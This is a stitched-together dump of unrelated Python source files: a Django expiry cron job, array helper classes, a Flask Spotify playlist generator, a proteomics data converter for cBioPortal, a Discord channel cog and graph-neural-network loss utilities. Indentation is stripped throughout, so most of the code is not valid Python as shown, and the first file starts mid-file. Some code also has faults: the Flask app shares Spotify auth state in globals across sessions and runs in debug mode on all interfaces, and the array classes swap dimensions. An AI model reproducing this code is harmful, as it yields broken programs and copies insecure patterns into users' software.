from companies.models import CompanyListing
from consultants.models import ConsultantListing
from events.models import EventListing
from groups.models import GroupListing
from datetime import timedelta
from django.utils import timezone
class MyCronJob(CronJobBase):
    RUN_EVERY_MINS = 1  # run every minute
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
code = "techpamlyapp.MyCronJob"
def do(self):
DAY = 7
#Items older than 7 days
items = list(JobListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY)))
items.extend(list(CompanyListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(GroupListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(ConsultantListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
items.extend(list(EventListing.objects.filter(date_posted__lte=timezone.now()-timedelta(days=DAY))))
for item in items:
item.is_Expired = True
item.save()
``` |
{
"source": "JJFReibel/MultidimensionalPythonArrays",
"score": 3
} |
#### File: JJFReibel/MultidimensionalPythonArrays/Array.py
```python
class Array_2D:
def __init__(self, x, y):
rows, cols = (x, y)
self.arr = [[None]*x for _ in range(y)]
def set(self, x, y, value):
self.arr[x][y] = value
def get(self, x, y):
return self.arr[x][y]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
print(self.arr[i][j])
print()
def expand(self, x, y):
arr2 = [[None]*x for _ in range(y)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
arr2[i][j] = self.arr[i][j]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y):
arr2 = [[None]*x for _ in range(y)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
arr2[i][j] = self.arr[i][j]
self.arr.clear()
self.arr = arr2
#3-D Array Class
class Array_3D:
def __init__(self, x, y, z):
rows, cols, thirds = (x, y, z)
self.arr = [[[None]*x for _ in range(y)] for _ in range(z)]
def set(self, x, y, z, value):
self.arr[x][y][z] = value
def get(self, x, y, z):
return self.arr[x][y][z]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
print(self.arr[i][j][k])
print()
def expand(self, x, y, z):
arr2 = [[[None]*x for _ in range(y)] for _ in range(z)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
arr2[i][j][k] = self.arr[i][j][k]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y, z):
arr2 = [[[None]*x for _ in range(y)] for _ in range(z)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
for k in range(len(arr2[0][0])):
arr2[i][j][k] = self.arr[i][j][k]
self.arr.clear()
self.arr = arr2
#4-D Array Class
class Array_4D:
def __init__(self, x, y, z, t):
rows, cols, thirds, tyme = (x, y, z, t)
self.arr = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
def set(self, x, y, z, t, value):
self.arr[x][y][z][t] = value
def get(self, x, y, z, t):
return self.arr[x][y][z][t]
def output(self):
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
for t in range(len(self.arr[0][0][0])):
print(self.arr[i][j][k][t])
print()
def expand(self, x, y, z, t):
arr2 = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
for i in range(len(self.arr)):
for j in range(len(self.arr[0])):
for k in range(len(self.arr[0][0])):
for t in range(len(self.arr[0][0][0])):
                        arr2[i][j][k][t] = self.arr[i][j][k][t]
self.arr.clear()
self.arr = arr2
def reduce(self, x, y, z, t):
arr2 = [[[[None]*x for _ in range(y)] for _ in range(z)] for _ in range(t)]
for i in range(len(arr2)):
for j in range(len(arr2[0])):
for k in range(len(arr2[0][0])):
for t in range(len(arr2[0][0][0])):
arr2[i][j][k][t] = self.arr[i][j][k][t]
self.arr.clear()
self.arr = arr2
#Example Use of 2D Array
myArr2D = Array_2D(5,2)
myArr2D.set(1,1,"Hello Mars!")
print(myArr2D.get(1,1))
print(myArr2D.arr)
print("Length 2D row before expansion: " + str(len(myArr2D.arr)))
print("Length 2D column before expansion: " + str(len(myArr2D.arr[0])))
myArr2D.output()
myArr2D.expand(7,3)
print("Length 2D row after expansion: " + str(len(myArr2D.arr)))
print("Length 2D column after expansion: " + str(len(myArr2D.arr[0])))
myArr2D.output()
myArr2D.reduce(1,2)
print("Length 2D row after reduction: " + str(len(myArr2D.arr)))
print("Length 2D column after reduction: " + str(len(myArr2D.arr[0])))
myArr2D.output()
#Example Use of 3D Array
myArr3D = Array_3D(5,2,3)
myArr3D.set(0,0,1,"Hello Mars!")
myArr3D.set(0,0,2,"Hello Mars!")
myArr3D.set(0,0,3,"Hello Mars!")
print("Length 3D third before expansion: " + str(len(myArr3D.arr)))
print("Length 3D row before expansion: " + str(len(myArr3D.arr[0])))
print("Length 3D column before expansion: " + str(len(myArr3D.arr[0][0])))
print()
myArr3D.output()
myArr3D.expand(7,3,4)
print("Length 3D third after expansion: " + str(len(myArr3D.arr)))
print("Length 3D row after expansion: " + str(len(myArr3D.arr[0])))
print("Length 3D column after expansion: " + str(len(myArr3D.arr[0][0])))
myArr3D.output()
myArr3D.reduce(1,2,3)
print("Length 3D third after reduction: " + str(len(myArr3D.arr)))
print("Length 3D row after reduction: " + str(len(myArr3D.arr[0])))
print("Length 3D column after expansion: " + str(len(myArr3D.arr[0][0])))
myArr3D.output()
#Example Use of 4D Array
myArr4D = Array_4D(5,2,3,4)
myArr4D.set(0,0,0,1,"Hello Mars!")
myArr4D.set(0,0,0,2,"Hello Mars!")
myArr4D.set(0,0,0,3,"Hello Mars!")
print("Length 4D tyme before expansion: " + str(len(myArr4D.arr)))
print("Length 4D third before expansion: " + str(len(myArr4D.arr[0])))
print("Length 4D row before expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column before expansion: " + str(len(myArr4D.arr[0][0][0])))
print()
myArr4D.expand(7,3,4,5)
print("Length 4D tyme after expansion: " + str(len(myArr4D.arr)))
print("Length 4D third after expansion: " + str(len(myArr4D.arr[0])))
print("Length 4D row after expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column after expansion: " + str(len(myArr4D.arr[0][0][0])))
myArr4D.output()
myArr4D.reduce(1,2,3,2)
print("Length 4D tyme after reduction: " + str(len(myArr4D.arr)))
print("Length 4D third after reduction: " + str(len(myArr4D.arr[0])))
print("Length 4D row after expansion: " + str(len(myArr4D.arr[0][0])))
print("Length 4D column after expansion: " + str(len(myArr4D.arr[0][0][0])))
myArr4D.output()
``` |
{
"source": "jjg28/SpotifyPlaylistGenerator-1",
"score": 3
} |
#### File: SpotifyPlaylistGenerator-1/flaskApp/application.py
```python
import os
from flask import Flask, session, request, redirect, render_template
from flask_session import Session
import spotipy
import json
import uuid
application = Flask(__name__)
application.config['SECRET_KEY'] = os.urandom(64)
application.config['SESSION_TYPE'] = 'filesystem'
application.config['SESSION_FILE_DIR'] = './.flask_session/'
Session(application)
spotify = ''
auth_manager=''
caches_folder = './.spotify_caches/'
if not os.path.exists(caches_folder):
os.makedirs(caches_folder)
scope = 'user-top-read user-read-playback-state streaming ugc-image-upload playlist-modify-public'
@application.route('/', methods=['GET','POST'])
def signIN():
global spotify
global auth_manager
if not session.get('uuid'):
# Step 1. Visitor is unknown, give random ID
session['uuid'] = str(uuid.uuid4())
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path(), show_dialog=True, scope=scope)
spotify = spotipy.Spotify(auth_manager=auth_manager)
if request.args.get("code"):
# Step 3. Being redirected from Spotify auth page
auth_manager.get_access_token(request.args.get("code"))
return redirect('/home')
if not auth_manager.get_cached_token():
# Step 2. Display sign in link when no token
auth_url = auth_manager.get_authorize_url()
return render_template('signIn.html',auth_url=auth_url)
# Step 4. Signed in, display data
return redirect('/home')
# @app.route('/')
@application.route('/home')
def index():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
name = spotify.me()["display_name"]
return render_template('home.html',name=name)
@application.route('/sign_out')
def sign_out():
os.remove(session_cache_path())
session.clear()
return redirect('/')
@application.route('/playlists')
def playlists():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
playlists1 = spotify.current_user_playlists()
playlists = []
for x in playlists1['items']:
playlists.append(x['name'])
style = 'background: transparent;'
return render_template('playlists.html',style=style,playlists=playlists)
@application.route('/topArtists')
def topArtists():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
topArtists1 = spotify.current_user_top_artists(limit=50,time_range="long_term")
topArtists = []
for x in topArtists1['items']:
topArtists.append(x['name'])
return render_template('topArtists.html',topArtists=topArtists)
@application.route('/generatePlaylist')
def makePlaylist():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
data = 'We do not judge who you listen to'
return render_template('generatePlaylist.html',data=data)
@application.route('/generatePlaylist', methods=['POST'])
def my_form_post():
global spotify
text = request.form['artist']
results = spotify.search(text,1,0,"artist")
artist = results['artists']['items'][0]
artist_uri = artist['uri']
recommendations = spotify.recommendations(seed_artists=[artist_uri], limit=25)
track_list = recommendations['tracks']
list_of_songs = []
for tracks in track_list:
# print(tracks['name'])
list_of_songs.append(tracks['uri'])
#create playlist
playlist_name = 'Similar to ' + artist['name']
playlist_description = 'Songs similar to ' + artist['name']
spotify.user_playlist_create(user=spotify.me()["id"],name=playlist_name,public=True,description=playlist_description)
#identify id of newest playlist
prePlaylists = spotify.user_playlists(user=spotify.me()["id"])
playlist = prePlaylists['items'][0]['id']
#add 25 songs
spotify.user_playlist_add_tracks(user=spotify.me()["id"], playlist_id=playlist, tracks=list_of_songs)
data = 'Playlist similar to music by ' + artist['name'] + ' has been added'
return render_template('generatePlaylist.html',data=data)
def session_cache_path():
return caches_folder + session.get('uuid')
if __name__ =='__main__':
application.run(host='0.0.0.0',port=8080, debug=True)
``` |
{
"source": "jjgao/cbio-proteomics",
"score": 3
} |
#### File: jjgao/cbio-proteomics/ms2cbioportal.py
```python
import abc
import os
import argparse
import re
import pickle
import numpy as np
import pandas as pd
BASE_ATTR = """
Parameters
----------
filename : str
The path and the name of the file.
sample_regex : str
A regex string for isolating sample columns.
ptm_type : str, None
The type of PTM (i.e. 'P' for phosphoprotein).
use_ruler : bool
Whether to use the proteomic ruler method.
Attributes
----------
df : pandas.DataFrame
A DataFrame containing the tabular experimental data.
"""
class MSTable(object, metaclass=abc.ABCMeta):
    """Base class for all MS table types. This is an abstract class so it
    cannot be instantiated directly. Please see CDAPiTraqTable, CDAPPrecursorAreaTable,
    MaxQuantProteomeTable, and/or MaxQuantPTMTable.
    """ + BASE_ATTR
def __init__(self, filename, sample_regex, ptm_type=None, use_ruler=False):
# these are private attributes
self.use_ruler = use_ruler
        self.self_path = os.path.dirname(os.path.abspath(__file__)) + '/'  # directory holding this module (and molar_mass.pkl)
# these are public attributes
self.df = pd.DataFrame()
# read in data from csv file
self.load_data(filename)
# perform tests for data columns and data length
self.check_data()
# clean and format the data
self.clean_rows()
self.format_genes(ptm_type)
self.clean_columns(sample_regex)
self.clean_values()
self.average_duplicates()
# transform data
if use_ruler:
self.proteomic_ruler()
def __repr__(self):
return str(self.df)
@property
def columns(self):
return self.df.columns
@property
def index(self):
return self.df.index
@property
def shape(self):
return self.df.shape
def head(self, n=5):
"""A wrapper for Pandas' `head` method.
Parameters
----------
n : int
Number of rows to return.
Returns
-------
head : pandas.DataFrame
The top `n` rows of the dataframe.
"""
head = self.df.head(n)
return head
def load_data(self, filename):
"""Load in a tab-separated experimental results file. Attaches the
DataFrame to the `df` attribute of the class.
Parameters
----------
filename : str
The path and the name of the input file.
Returns
-------
None
"""
try:
self.df = pd.read_csv(filename, sep='\t', header=0)
except OSError:
            print('File {0} not found. Could not be converted into a Pandas dataframe.'.format(filename))
raise
return
def clean_columns(self, sample_regex):
"""Isolate sample columns from the larger tabular data using
a regular expression. Modifies instance `df` attribute.
Parameters
----------
sample_regex : str
A regex string for isolating sample columns.
Returns
-------
None
"""
sample_columns = [col for col in self.df.columns if re.match(sample_regex, col)]
if not sample_columns:
raise ValueError('`sample_regex` was not able to find any columns.')
self.df = self.df[sample_columns]
return
@abc.abstractmethod
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Requires method overloading."""
return
@abc.abstractmethod
def clean_rows(self):
"""Method that removes extraneous rows depending on the experiment
type. Requires method overloading."""
return
@abc.abstractmethod
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index.
Requires method overloading."""
return
def clean_values(self):
"""Clean the data of `np.inf`.
Parameters
----------
None
Returns
-------
None
"""
self.df.replace((np.inf, -np.inf), np.nan, inplace=True)
return
def log_transform(self):
"""Log2 transform data.
Parameters
----------
None
Returns
-------
None
"""
self.df = np.log2(self.df + 1)
return
def proteomic_ruler(self):
"""Apply the proteomic ruler to the data to obtain copy number
per cell estimates based on Wiśniewski et al. 2014. Uses the formula:
Protein Copy Number = Protein MS Signal x (Avogadro's Number/Molar Mass)
x (DNA Mass/Histone MS Signal)
Parameters
----------
None
Returns
-------
None
"""
# check for negative values
min_val = np.nanmin(self.df.values)
if min_val < 0:
raise ValueError("""Negative values detected. Proteomic ruler only supports MS intensity values.
If this is a mistake, set use_ruler=False.""")
# load some constants
molar_mass = pickle.load(open(self.self_path + 'molar_mass.pkl', 'rb'))
avogadro = 6.022 * 10**23
dna_mass = 6.5 * 10**-12 # 6.5 pg
# get col of avogadro/molar mass
molar_col = []
for ind in self.df.index:
try:
molar_col.append(molar_mass[ind.split('|')[0]])
except KeyError:
molar_col.append(np.nan)
molar_col = pd.Series(molar_col)
molar_col.index = self.df.index
avo_mol = molar_col.rtruediv(avogadro)
# get row of sum of histones
hist_row = self.df[self.df.index.to_series().str.contains('HIST', na=False)].sum()
# apply equation
self.df = self.df.div(hist_row).multiply(avo_mol, axis=0).multiply(dna_mass)
return
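    # Illustrative back-of-envelope check of the ruler (hypothetical numbers, not from
    # the source data): a row with MS signal 2.0e9 and molar mass 5.0e4 g/mol, against a
    # summed histone signal of 1.0e11, gives roughly
    #   2.0e9 * (6.022e23 / 5.0e4) * (6.5e-12 / 1.0e11) ~= 1.6e6 copies per cell,
    # a plausible per-cell copy number for an abundant protein.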
def average_duplicates(self):
"""Average any duplicated sample columns by taking the mean across
the duplicate samples.
Parameters
----------
None
Returns
-------
None
"""
nondup_df = self.df[self.df.columns[~self.df.columns.duplicated(keep=False)]]
uniq_dup_cols = list(set(self.df.columns[self.df.columns.duplicated(keep=False)]))
dedup_df = pd.DataFrame(index=nondup_df.index, columns=uniq_dup_cols)
for col in uniq_dup_cols:
            dedup_df[col] = self.df[col].mean(axis=1)  # DataFrame.mean skips NaN by default
self.df = pd.concat((nondup_df, dedup_df), axis=1)
return
def rename_columns(self, renamer):
"""Rename all sample columns using a custom function.
Parameters
----------
renamer : function
A function that applies a transformation on each column name.
Returns
-------
None
"""
self.df.columns = [renamer(col) for col in self.df.columns]
return
def vertical_concat(self, table):
"""Concatenate data from two experiments together by vertical concatenation.
This is for combining proteins and PTMs from the same tissue type. It will
not average duplicate genes.
Parameters
----------
table : ms2cbioportal.MSTable
An instance derived from `MSTable`.
Returns
-------
None
"""
self.df = pd.concat((self.df, table.df), axis=0)
return
def horizontal_concat(self, table):
"""Concatenate data from two experiments together by horizontal concatenation.
This is for combining the same experiment type but with two (or more, since
you can chain the concatenation) sample sets.
Parameters
----------
table : ms2cbioportal.MSTable
An instance derived from `MSTable`.
Returns
-------
None
"""
self.df = pd.concat((self.df, table.df), axis=1)
return
def write_csv(self, filename):
"""Write finished DataFrame to file.
Parameters
----------
filename : str
The path and the name of the output file.
Returns
-------
None
"""
self.df.to_csv(filename, sep='\t', header=True, index=True)
return
class CDAPTable(MSTable):
"""Base class for all CDAP table types. Please see CDAPiTraqTable, CDAPPrecursorAreaTable.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for 'Gene' columns and the presence
of multiple rows.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert 'Gene' in self.df.columns
return
def clean_rows(self):
"""Method that removes extraneous rows. For CDAP experiments, rows with 'Mean',
'Median', and 'StdDev' are mixed in with genes in the 'Gene' column.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Gene'].str.contains('Mean|Median|StdDev', na=True)]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. First checks
to see if the table is a PTM by checking for the associated name (only phosphosites
supported at this time for CDAP). PTMs are built using the format
GENE|GENE_<ptm_type><amino acid><amino acid site>
Multi-site PTMs are chained with underscores. Otherwise, the gene is
formatted as
GENE|GENE
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
ptm_name = {
'P' : 'Phosphosite',
}
if ptm_type and ptm_name[ptm_type] in self.df.columns:
anno = []
for g, ph in zip(self.df['Gene'], self.df[ptm_name[ptm_type]]):
ptm_site = ph.split(':')[1]
ptm_build = re.sub('[A-Z]+', lambda m: '_'+m.group(0), ptm_site.upper())[1:]
anno.append('{0}|{0}_{1}{2}'.format(g, ptm_type, ptm_build))
else:
anno = ['{0}|{0}'.format(g) for g in self.df['Gene']]
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
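    # Worked example of the index format (hypothetical row, for illustration only):
    # Gene 'EGFR' with Phosphosite 'EGFR:s1166t1172' and ptm_type 'P' becomes
    #   'EGFR|EGFR_PS1166_T1172'
    # while a plain proteome row for 'EGFR' becomes 'EGFR|EGFR'.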
class CDAPiTraqTable(CDAPTable):
"""Class for CDAP experiments for proteome and PTM quantification using iTRAQ.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class CDAPPrecursorAreaTable(CDAPTable):
"""Class for CDAP experiments for proteome and PTM quantification using intensities.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.use_ruler:
self.log_transform()
class MaxQuantProteomeTable(MSTable):
"""Class for MaxQuant experiments for proteome MS quantification.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for the presence of multiple rows.
Also checks for 'Protein IDs', 'Gene names', and 'Q-value' columns.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert all(col in self.df.columns for col in ('Protein IDs',
'Gene names',
'Q-value'))
return
def clean_rows(self):
"""Method that removes extraneous rows. For MaxQuant proteome quantification,
it takes out rows with 'REV' or 'CON' and rows with a 'Q-value' over 0.05.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Protein IDs'].str.contains('REV|CON', na=True)]
self.df = self.df[pd.notnull(self.df['Gene names'])]
self.df = self.df[self.df['Q-value'] < 0.05]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. Format
used is 'GENE|GENE'.
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
anno = ['{0}|{0}'.format(g.split(';')[0]) for g in self.df['Gene names']]
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
class MaxQuantPTMTable(MSTable):
"""Class for MaxQuant experiments for PTM MS quantification.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for the presence of multiple rows.
Also checks for 'Protein', 'Amino acid', 'Positions within proteins',
'Gene names', and 'Localization prob' columns.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert all(col in self.df.columns for col in ('Protein',
'Amino acid',
'Positions within proteins',
'Gene names',
'Localization prob'))
return
def clean_rows(self):
"""Method that removes extraneous rows. For MaxQuant PTM quantification,
it takes out rows with 'REV' or 'CON', rows with a null 'Gene names' entry,
and rows where 'Localization prob' is less than 0.75.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Protein'].str.contains('REV|CON', na=True)]
self.df = self.df[pd.notnull(self.df['Gene names'])]
self.df = self.df[self.df['Localization prob'] > 0.75]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. Phosphosites
are built using the format 'GENE|GENE_P<ptm_type><amino acid site>'.
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
prot_pos = [p.split(';')[0] for p in self.df['Positions within proteins']]
aa_col = self.df['Amino acid'].tolist()
genes = [g.split(';')[0] for g in self.df['Gene names']]
anno = []
for g, aa, pos in zip(genes, aa_col, prot_pos):
anno.append('{0}|{0}_{1}{2}{3}'.format(g, ptm_type, aa, pos))
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
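    # Worked example (hypothetical row, for illustration only): 'Gene names' of
    # 'AKT1;AKT2', 'Amino acid' 'S', 'Positions within proteins' '473;474' and
    # ptm_type 'P' yield the index entry 'AKT1|AKT1_PS473'.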
META_TEXT = """cancer_study_identifier: {0}
genetic_alteration_type: PROTEIN_LEVEL
datatype: Z-SCORE
stable_id: protein_quantification
profile_description: Protein Quantification (Mass Spec)
show_profile_in_analysis_tab: true
profile_name: Protein levels (mass spectrometry by CPTAC)
data_filename: {1}"""
class MSMeta(object):
"""A class for building metadata for MSTable derived classes.
Parameters
----------
cancer_id : str
Cancer ID string supplied by cBioPortal (i.e. 'brca_tcga').
prot_file : str
Path and filename of the file generated by MSTable derived classes.
"""
def __init__(self, cancer_id, prot_file):
self.text = META_TEXT.format(cancer_id, prot_file)
def __repr__(self):
return self.text
def write(self, filename):
"""Write finished metadata to file.
Parameters
----------
filename : str
The path and the name of the output file.
Returns
-------
None
"""
with open(filename, 'w') as f:
f.write(self.text)
return
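# Minimal usage sketch (illustrative only; the file names and the sample-column regex
# below are assumptions, not part of this module):
#   prot = CDAPiTraqTable('proteome.tsv', r'TCGA.*')
#   phos = CDAPiTraqTable('phospho.tsv', r'TCGA.*', ptm_type='P')
#   prot.vertical_concat(phos)
#   prot.write_csv('data_protein_quantification.txt')
#   MSMeta('brca_tcga', 'data_protein_quantification.txt').write('meta_protein_quantification.txt')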
``` |
{
"source": "JJgar2725/meowBot",
"score": 3
} |
#### File: meowBot/Cogs/creation.py
```python
import discord
from discord.ext import commands
# cog for storing creation commands
class Creation(commands.Cog):
# constructor
def __init__(self, bot):
self.bot = bot
# command to create a basic text channel
@commands.group(invoke_without_command=True)
@commands.has_permissions(manage_channels=True)
async def create(self, ctx, *, channel_name: str):
channel = await ctx.guild.create_text_channel(channel_name)
await channel.send("Text channel {} was created!".format(channel_name))
# command to create a basic voice channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def voice(self, ctx, *, channel_name: str):
channel = await ctx.guild.create_voice_channel(channel_name)
await ctx.send("Voice channel {} was created!".format(channel_name))
# command to create a private text channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def priv(self, ctx, *, channel_name: str):
# find needed roles and store them in variables for later use
admin = discord.utils.get(ctx.guild.roles, name="Supreme Piano Ruler")
mods = discord.utils.get(ctx.guild.roles, name="Black Keys")
# using a dictionary, permissions can be chosen for the new channel
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(read_messages=False),
ctx.guild.me: discord.PermissionOverwrite(read_messages=True),
admin: discord.PermissionOverwrite(read_messages=True),
mods: discord.PermissionOverwrite(read_messages=True)
}
channel = await ctx.guild.create_text_channel(channel_name, overwrites=overwrites)
await channel.send("Private text channel {} was created!".format(channel_name))
# command to create a private voice channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def priv_voice(self, ctx, *, channel_name: str):
admin = discord.utils.get(ctx.guild.roles, name="Supreme Piano Ruler")
mods = discord.utils.get(ctx.guild.roles, name="Black Keys")
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(read_messages=False),
ctx.guild.me: discord.PermissionOverwrite(read_messages=True),
admin: discord.PermissionOverwrite(read_messages=True),
mods: discord.PermissionOverwrite(read_messages=True)
}
channel = await ctx.guild.create_voice_channel(channel_name, overwrites=overwrites)
await ctx.send("Private voice channel {} was created!".format(channel_name))
# command to delete a given channel
@commands.command()
@commands.has_permissions(manage_channels=True)
async def delete(self, ctx, *, channel_name: str):
# search through channels on a guild for given channel name
channel = discord.utils.get(ctx.guild.channels, name=channel_name)
await channel.delete()
await ctx.send("Channel {} was deleted!".format(channel_name))
# setup method to add bot
def setup(bot):
bot.add_cog(Creation(bot))
``` |
{
"source": "jjgarau/GNND",
"score": 3
} |
#### File: jjgarau/GNND/util.py
```python
import torch
import numpy as np
import matplotlib.pyplot as plt
from torch_geometric.data import Data
from torch_geometric_temporal.nn import *
def mape_loss(output, label):
return torch.mean(torch.abs(torch.div((output - label), label)))
def mse_loss(output, label, mean=None):
return torch.mean(torch.square(output - label))
def msse_loss(output, label, mean=None):
return torch.mean(torch.div(torch.square(output - label), label + 1))
def rmse_loss(output, label):
return torch.sqrt(torch.mean(torch.square(output - label)))
def mae_loss(output, label):
return torch.mean(torch.abs(output - label))
def mase_loss(output, label, mean=None):
    label_mean = torch.mean(label)
    if mean is not None:
        # Reshape only when a scaling mean is supplied; calling .reshape on None would fail.
        mean = mean.reshape(output.shape)
        return torch.mean(torch.abs(output - label) / mean)
    elif label_mean == 0:
        return torch.mean(torch.abs(output - label))
    else:
        return torch.mean(torch.abs(output - label)) / label_mean
def mase1_loss(output, label, mean=None):
# Extreme 1: all countries equal
# L_i = (x_i - y_i)^2 / y_i
# L = (L_1 + L_2 + … + L_N) / N
label = label[:, 0]
output = output.reshape(output.shape[0])
label_mean = torch.mean(label)
if not mean is None:
return torch.mean(torch.abs(output - label) / mean)
if label_mean == 0:
return torch.mean(torch.abs(output - label))
else:
return torch.mean(torch.abs(output - label)) / label_mean
def mase2_loss(output, label, mean=None):
# Extreme 2: all people equal
# X = (x_1 + x_2 + … + x_N)
# Y = (y_1 + y_2 + … + y_N)
# L = (X - Y)^2 / Y
label = label[:, 0]
X = torch.sum(output)
Y = torch.sum(label)
if Y == 0 and not mean is None:
return torch.abs(X - Y) / torch.sum(mean)
elif Y == 0:
return torch.abs(X - Y)
else:
return torch.abs(X - Y) / Y
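# Illustrative call (hypothetical values; shapes follow the slicing above, where the
# target sits in column 0 of `label`):
#   output = torch.tensor([10., 20.]); label = torch.tensor([[12.], [18.]])
#   mase2_loss(output, label)  # -> |30 - 30| / 30 = 0.0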
def anti_lag_loss(output, label, lagged_label, mean=None, loss_func=mase2_loss, penalty_factor=0.1):
output = output.reshape(output.shape[0])
lagged_label = lagged_label.reshape(lagged_label.shape[0])
# Or instead of penalty factor (or with it) should I be using the same loss function and taking the inverse square of that to ensure good scaling?
penalty = torch.mean(torch.div(1, torch.square(output - lagged_label)))
return loss_func(output, label, mean=mean) + penalty * penalty_factor
def lag_factor(output, lagged_label):
return torch.div(torch.abs(output - lagged_label), lagged_label)
def mase3_loss(output, label, populations, mean=None, k=500000):
# Middle point: consider a population threshold k
# x_k = sum(x_i) such that country i has less than k population
# y_k = sum(y_i) such that country i has less than k population
# L_i = (x_i - y_i)^2 / y_i for countries i with more than k population
# L_k = (x_k - y_k)^2 / y_k
# L = L_k + sum(L_i)
label = label[:, 0]
if mean is None:
mean = torch.mean(label)
if sum(mean) == 0:
mean = 1
large_outputs = []
large_labels = []
large_means = []
small_outputs = []
small_labels = []
small_means = []
for i in range(len(populations)):
if populations[i] < k:
small_outputs.append(output[i])
small_labels.append(label[i])
small_means.append(mean[i])
else:
large_outputs.append(output[i])
large_labels.append(label[i])
large_means.append(mean[i])
x_k = sum(small_outputs)
y_k = sum(small_labels)
L_i = torch.abs(torch.FloatTensor(large_outputs) - torch.FloatTensor(large_labels)) / torch.FloatTensor(large_means)
L_k = abs(x_k - y_k) / sum(small_means)
return L_k + torch.sum(L_i)
def inv_reg_mase_loss(output, label):
return mase_loss(output, label) + torch.mean(torch.div(1, output))
def train_gnn(model, loader, optimizer, loss_func, device):
model.train()
loss_all = 0
for data in loader:
data = data.to(device)
optimizer.zero_grad()
output = model(data)
label = data.y.to(device)
output = torch.reshape(output, label.shape)
loss = loss_func(output, label)
loss.backward()
loss_all += data.num_graphs * loss.item()
optimizer.step()
return loss_all
def evaluate_gnn(model, loader, device):
model.eval()
predictions, labels = [], []
with torch.no_grad():
for data in loader:
data = data.to(device)
pred = model(data).detach().cpu().numpy()
label = data.y.detach().cpu().numpy()
pred = pred.reshape(label.shape)
predictions.append(pred)
labels.append(label)
p = np.vstack(predictions)
l = np.vstack(labels)
return np.mean(np.abs(p - l)) / np.mean(l) #np.mean(abs((labels - predictions) / labels)) #reporting loss function, different from training
def evaluate_gnn_recurrent(model, dataset, lookback_pattern, loss_func):
predictions, labels, losses = [], [], []
def forward(snapshot, h, c, detach=False):
if type(model) is GConvLSTM or type(model) is GConvGRU:
h, c = model(snapshot.x, snapshot.edge_index, snapshot.edge_attr[:, 0], h, c)
if detach:
h = h.detach()
c = c.detach()
return h, h, c
else:
return model(snapshot, h, c)
model.eval()
with torch.no_grad():
cost = 0
for time, snapshot in enumerate(dataset):
h, c = None, None
for sub_time in range(len(lookback_pattern)):
sub_snapshot = Data(x=snapshot.x[:, sub_time:sub_time + 1], edge_index=snapshot.edge_index,
edge_attr=snapshot.edge_attr)
y_hat, h, c = forward(sub_snapshot, h, c, detach=True)
predictions.append(y_hat)
labels.append(snapshot.y)
cost += loss_func(y_hat, snapshot.y)
cost /= time + 1
cost = cost.item()
losses.append(cost)
return predictions, labels, losses
def show_predictions(predictions, labels):
# Plot predictions and labels over time
x = np.arange(0, len(predictions['train']))
plt.title('COVID Europe Dataset')
plt.xlabel("Time (days)")
plt.ylabel("New Cases")
plt.plot(x, [torch.mean(p) for p in predictions['train']], label="Predictions")
